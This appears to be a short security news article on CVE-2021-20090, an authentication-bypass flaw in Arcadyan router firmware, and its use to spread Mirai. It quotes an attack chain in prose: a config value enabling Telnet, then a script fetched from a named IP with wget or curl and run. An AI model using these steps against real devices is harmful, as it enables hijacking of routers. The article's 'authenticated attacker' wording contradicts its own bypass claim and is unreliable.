After existing for years, a serious vulnerability in Arcadyan firmware threatens IoT security as hackers exploit it to target routers. The threat actors are actively exploiting this bug to deploy Mirai botnet payloads.
Years Old Arcadyan Firmware Vulnerability
A security researcher from Tenable has shared insights about a serious bug affecting millions of routers.
According to the report, the vulnerability actually exists in the Arcadyan firmware powering routers from different vendors. Specifically, he found a path traversal vulnerability (CVE-2021–20090) that allows authentication bypass. Hence, an authenticated remote attacker can exploit the flaw to take over target devices.
In the case of routers, this becomes a critical bug that allows taking over the entire network of the victim.
Ironically, the bug has existed for around 10 years. The researcher discovered this vulnerability while inspecting the Buffalo WSR-2533DHPL2 router. But, digging up further revealed that it actually affects 20 different router models from 17 vendors. Thus, it bears the potential to trigger massive supply-chain attacks.
Tenable has shared the list of affected devices and the PoC in an advisory along with a detailed whitepaper. Whereas, the following video also demonstrates the exploit.
A little video demo from the Buffalo writeup ( https://t.co/ySft5EP299 ) : pic.twitter.com/1ulDi0CyXZ
— evan grant (@stargravy) August 3, 2021
Active Exploits Threatens Routers Globally
Soon after Tenable made its report public, researchers from Juniper Networks noticed active exploitation of the vulnerability.
According to their blog post, the researchers have found that the attackers are exploiting it for deploying Mirai botnet payloads. The attacks link back to an IP address from Wuhan, China, through which the attack executes via POST method. As stated,
The attacker will modify the configuration of the attacked device to enable Telnet using “ARC_SYS_TelnetdEnable=1” then proceeds to download a new script from the IP address 212.192.241[.]72 using either wget or curl and then executes it.
Given that it might take time for the users to apply the patches, the attackers have got enough time to wage large-scale campaigns.
Therefore, all users must ensure updating their routers to patch this vulnerability at the earliest.